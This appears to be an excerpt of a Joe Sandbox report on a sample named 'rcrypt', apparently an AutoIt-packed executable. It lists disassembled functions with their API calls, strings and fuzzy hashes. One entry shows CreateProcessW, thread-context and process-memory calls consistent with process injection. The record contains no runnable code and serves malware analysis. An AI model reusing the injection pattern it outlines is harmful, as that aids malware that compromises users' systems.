Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 7c2bce90f210155b6e1f497c94c0439e1786329c489794e5b2010c8be94bfda2
Instruction ID: 300b3c24175230aff99d9d0601aa814eeb1330d575f2134e969988e0eabd839c
Opcode Fuzzy Hash: 7c2bce90f210155b6e1f497c94c0439e1786329c489794e5b2010c8be94bfda2
Instruction Fuzzy Hash: 3B919071910229EFCF08EFA4DC919EEB7B4FF19310F14446AF915AB292EB309915DB60

Function 000F35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000F35A1,SwapMouseButtons,00000004,?), ref: 000F35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000F35A1,SwapMouseButtons,00000004,?,?,?,?,000F2754), ref: 000F35F5
RegCloseKey.KERNELBASE(00000000,?,?,000F35A1,SwapMouseButtons,00000004,?,?,?,?,000F2754), ref: 000F3617

Strings

Control Panel\Mouse, xrefs: 000F35D2

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: d6364716fe0dd43820d1355d199de1513d0f41ceff7aacd9d25d5715cdef9faf
Instruction ID: 459e25c82100d46f473d619df184f5ece386fa73e63f4ab2949d9c115f42aeb6
Opcode Fuzzy Hash: d6364716fe0dd43820d1355d199de1513d0f41ceff7aacd9d25d5715cdef9faf
Instruction Fuzzy Hash: DD11457561020CBFDF208F64DC84ABFBBB9EF04750F008469F909D7210E2719E81ABA0

Function 016F12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 016F1ACD
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016F1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016F1B13

Memory Dump Source

Source File: 00000000.00000002.1319460756.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_rcrypt.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
Instruction ID: 78a231296c33432c8f015b7b0ec22ef619f1247aee4c8461a71256a05bb6466a
Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
Instruction Fuzzy Hash: 6A62F830A14258DAEB24DFA4CC50BDEB772EF59300F1091A9D20DEB394E7799E81CB59

Function 001597E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 000F5045: _fseek.LIBCMT ref: 000F505D

Part of subcall function 001599BE: _wcscmp.LIBCMT ref: 00159AAE
Part of subcall function 001599BE: _wcscmp.LIBCMT ref: 00159AC1

_free.LIBCMT ref: 0015992C
_free.LIBCMT ref: 00159933
_free.LIBCMT ref: 0015999E

Part of subcall function 00112F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00119C64), ref: 00112FA9
Part of subcall function 00112F95: GetLastError.KERNEL32(00000000,?,00119C64), ref: 00112FBB

_free.LIBCMT ref: 001599A6

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
Instruction ID: 1239498643cd1294a10b4e9fd9b217f341b924fda2c32fa2722f4b082c24be6e
Opcode Fuzzy Hash: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
Instruction Fuzzy Hash: 7F516FB1904218EFDF249F64DC45AEEBBB9EF48300F0004AEF619A7242DB715A94CF59

Function 0011493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001149D0
__flush.LIBCMT ref: 001149F0
__write.LIBCMT ref: 00114A23
__flsbuf.LIBCMT ref: 00114A51

Part of subcall function 00118D68: __getptd_noexit.LIBCMT ref: 00118D68

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: 46e5136d76b5c2e746c91049621897395e2bc67085b573e6b243a8ccba87832c
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: DB41D575A0070A9BDF2CCEA9D8809EF77A6EF84B64B25813DE856C7640E7719DC08B44

Function 000F73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0012EE62
GetOpenFileNameW.COMDLG32(?), ref: 0012EEAC

Part of subcall function 000F48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000F48A1,?,?,000F37C0,?), ref: 000F48CE

Part of subcall function 001109D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001109F4

Strings

X, xrefs: 0012EE7A

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 39d656f926614fde0406b7dfa0402005f7656e97f71081f8ab4ab5a093746ce3
Instruction ID: 35d717bddf8f4f6fbca5e450e7c9e4d9fa874b99ddb7f8f97856bb062b5f0aab
Opcode Fuzzy Hash: 39d656f926614fde0406b7dfa0402005f7656e97f71081f8ab4ab5a093746ce3
Instruction Fuzzy Hash: C221A171A0025C9BCB11DF94D845BEE7BF9AF49300F00405AE508AB242DBB8598A9BA1

Function 0015901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00159036
__fread_nolock.LIBCMT ref: 0015904B

Strings

EA06, xrefs: 0015907D

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 6494c8707094921fae0e527d91b04c183791a249fc9f712b9c292d1b956f346c
Instruction ID: d9c2de71d0974e00c262d8cd58291e70182cf0400fca41c39fe051af4c16b335
Opcode Fuzzy Hash: 6494c8707094921fae0e527d91b04c183791a249fc9f712b9c292d1b956f346c
Instruction Fuzzy Hash: C801F971C04218BEDB28C6A8C856EEEBBFCDB15301F00459AF552D6181E675A608C760

Function 00159B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00159B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00159B99

Strings

aut, xrefs: 00159B93

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 0fa39ece6fd69cdceef5795b7287eda2e301e376367669e9c782694eed6bcdd4
Instruction ID: 53c161c2b453f8c1ca5af4a3bd5fa9e4736282025b02a6929dbbfd3ebbcef934
Opcode Fuzzy Hash: 0fa39ece6fd69cdceef5795b7287eda2e301e376367669e9c782694eed6bcdd4
Instruction Fuzzy Hash: 26D05E7954030DABDB109B90DC0EFAB773CEB04700F0042A1BE58920A2EEB099D98B91

Function 0016CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47fd2037e050fe626cc134584c8a0b33d566af93e4d9009c14da603171ac311
Instruction ID: 33c2167a388d4f44bba20b8aff9f92192e5aac880735452d4a81c7059cf22ea8
Opcode Fuzzy Hash: d47fd2037e050fe626cc134584c8a0b33d566af93e4d9009c14da603171ac311
Instruction Fuzzy Hash: C8F15A71A083059FC714DF28C880A6ABBE5FF88314F54892EF8999B352D771E955CF82

Function 000FF8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 001103A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001103D3
Part of subcall function 001103A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 001103DB
Part of subcall function 001103A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001103E6
Part of subcall function 001103A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001103F1
Part of subcall function 001103A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 001103F9
Part of subcall function 001103A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00110401

Part of subcall function 00106259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,000FFA90), ref: 001062B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000FFB2D
OleInitialize.OLE32(00000000), ref: 000FFBAA
CloseHandle.KERNEL32(00000000), ref: 001349F2

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 9372992b732bd1d418349d0b710217b54dedad74a27b30dac4adf15ab790440f
Instruction ID: 4767658eed702040b104abafd83c7e3a3d948ff6a7fb687d8aa4b40dbcb2fb6a
Opcode Fuzzy Hash: 9372992b732bd1d418349d0b710217b54dedad74a27b30dac4adf15ab790440f
Instruction Fuzzy Hash: C981BAB1904A408EC394EF2AEE556A67BF4FB78308710863ED018D7A72EB7D4485CF51

Function 0011594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00115963

Part of subcall function 0011A3AB: __NMSG_WRITE.LIBCMT ref: 0011A3D2
Part of subcall function 0011A3AB: __NMSG_WRITE.LIBCMT ref: 0011A3DC

__NMSG_WRITE.LIBCMT ref: 0011596A

Part of subcall function 0011A408: GetModuleFileNameW.KERNEL32(00000000,001B43BA,00000104,?,00000001,00000000), ref: 0011A49A
Part of subcall function 0011A408: ___crtMessageBoxW.LIBCMT ref: 0011A548

Part of subcall function 001132DF: ___crtCorExitProcess.LIBCMT ref: 001132E5
Part of subcall function 001132DF: ExitProcess.KERNEL32 ref: 001132EE

Part of subcall function 00118D68: __getptd_noexit.LIBCMT ref: 00118D68

RtlAllocateHeap.NTDLL(00A50000,00000000,00000001,00000000,?,?,?,00111013,?), ref: 0011598F

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 4794c0efe9da38a2aaaddfda4aa6eed4ccf52016944bce37866743fad613c87a
Instruction ID: ee8e964ae8d2845e6aeaa6713369edc522bf30c8a2e455c736d59d3e49d3504c
Opcode Fuzzy Hash: 4794c0efe9da38a2aaaddfda4aa6eed4ccf52016944bce37866743fad613c87a
Instruction Fuzzy Hash: 6301D231201B29DFEB1D2B64EC42AEE724A9FA1B38F51413AF4009A281DB709DC18262

Function 00159B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,001597D2,?,?,?,?,?,00000004), ref: 00159B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,001597D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00159B5B
CloseHandle.KERNEL32(00000000,?,001597D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00159B62

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: f6a93abb7ddaada1e389cfa716029187950fd814186e662b1c62c0d9ca2a15ec
Instruction ID: 2fab6ff5e01edd1b8ae4540883b7d7caebf12c25197d263533dcc464c110d499
Opcode Fuzzy Hash: f6a93abb7ddaada1e389cfa716029187950fd814186e662b1c62c0d9ca2a15ec
Instruction Fuzzy Hash: E8E08632581214F7E7212B64EC09FCB7B68AB05761F104124FB28690E087B12592D798

Function 00158F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00158FA5

Part of subcall function 00112F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00119C64), ref: 00112FA9
Part of subcall function 00112F95: GetLastError.KERNEL32(00000000,?,00119C64), ref: 00112FBB

_free.LIBCMT ref: 00158FB6
_free.LIBCMT ref: 00158FC8

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
Instruction ID: c8d58b55bdd2926c0f6878dc76f1410aa55a5cce7ec62b1bf1430284773cfe0e
Opcode Fuzzy Hash: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
Instruction Fuzzy Hash: 71E012A170D7028ADE28A578BD44AD357EE5F4C352B18082EF859EF142EF34EC968124

Function 000FAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0013002B

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 33b2e3a56c2957254de02fed8580e3f67f80f882e5e21e85c5ff149dca4d5d1b
Instruction ID: 215d21edc82f21e3d536f96a6059156b7b64d2d7fbcd5addce7a26614c243e5f
Opcode Fuzzy Hash: 33b2e3a56c2957254de02fed8580e3f67f80f882e5e21e85c5ff149dca4d5d1b
Instruction Fuzzy Hash: E02249B0608205DFC724DF14C494B6ABBE1BF89300F15896DF98A8B762D731ED85DB82

Function 000F4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000F4E1A

Strings

EA06, xrefs: 0012DCF5

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 746db24695d984b2a97a1d481a68d1ec4d066a1250efea189110f731b9b05062
Instruction ID: 33bdc62d2d0127d62331194d8bea45c87ae10c3a8cf9cba72e3dcf9f4a328364
Opcode Fuzzy Hash: 746db24695d984b2a97a1d481a68d1ec4d066a1250efea189110f731b9b05062
Instruction Fuzzy Hash: 0C417C21A0415C6BDF219B64DC917FF7FA6AB05300F684074FF82ABA83C6618E44A3A1

Function 000F492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 000F4992

Part of subcall function 001135AC: __lock.LIBCMT ref: 001135B2
Part of subcall function 001135AC: DecodePointer.KERNEL32(00000001,?,000F49A7,001481BC), ref: 001135BE
Part of subcall function 001135AC: EncodePointer.KERNEL32(?,?,000F49A7,001481BC), ref: 001135C9

Part of subcall function 000F4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000F4A73
Part of subcall function 000F4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000F4A88

Part of subcall function 000F3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000F3B7A
Part of subcall function 000F3B4C: IsDebuggerPresent.KERNEL32 ref: 000F3B8C
Part of subcall function 000F3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,001B62F8,001B62E0,?,?), ref: 000F3BFD
Part of subcall function 000F3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 000F3C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000F49D2

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 3b3959f62cf5ab2e214fee59de35c9be437de411c31f11ebe15afcd2a3665a5b
Instruction ID: 1cc23d418b5f8663b3a7c58eab4301466e4b7ba93d6e30a8c5512995777cbd40
Opcode Fuzzy Hash: 3b3959f62cf5ab2e214fee59de35c9be437de411c31f11ebe15afcd2a3665a5b
Instruction Fuzzy Hash: 4611CD719183059FC300DF28DC0596BFBF8EBA4710F00461EF554836B2DBB48A95CB92

Function 000F5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,000F5981,?,?,?,?), ref: 000F5E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,000F5981,?,?,?,?), ref: 0012E19C

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: de2d24c984077a612bda9255f30031a3d720f6f1069b570a5c680b29b0820235
Instruction ID: 2de154d232f2212806be47fe51f7424a321714321ddbe8af8951631107eb0bfd
Opcode Fuzzy Hash: de2d24c984077a612bda9255f30031a3d720f6f1069b570a5c680b29b0820235
Instruction Fuzzy Hash: A6019270244708BEF7685E24DC8AF763ADCAB01769F108328BBE55A5E0C6B01E959B50

Function 00110FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0011594C: __FF_MSGBANNER.LIBCMT ref: 00115963
Part of subcall function 0011594C: __NMSG_WRITE.LIBCMT ref: 0011596A
Part of subcall function 0011594C: RtlAllocateHeap.NTDLL(00A50000,00000000,00000001,00000000,?,?,?,00111013,?), ref: 0011598F

std::exception::exception.LIBCMT ref: 0011102C
__CxxThrowException@8.LIBCMT ref: 00111041

Part of subcall function 001187DB: RaiseException.KERNEL32(?,?,?,001ABAF8,00000000,?,?,?,?,00111046,?,001ABAF8,?,00000001), ref: 00118830

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

